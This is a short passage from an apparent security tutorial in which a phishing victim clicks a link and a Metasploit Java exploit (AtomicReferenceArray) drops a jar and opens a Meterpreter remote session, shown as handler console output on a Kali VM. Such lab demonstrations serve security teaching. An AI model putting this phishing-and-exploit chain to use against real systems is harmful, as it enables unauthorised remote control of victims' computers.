What can the attacker do with their access?

After Mark clicks on the link in the email, we send him the following messages, which appear in the Metasploit handler screen on the Kali Linux VM:

msf exploit(java_atomicreferencearray) > [*]     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability[*]     java_atomicreferencearray - Generated jar to drop (5122 bytes).[*]     java_atomicreferencearray - Sending jar[*]     java_atomicreferencearray - Sending jar[*] Sending stage (49645 bytes) to[*] Meterpreter session 2 opened ( -> at 2017-06-04 09:20:37 -0400

What is shown here is the establishment of a Meterpreter session ...

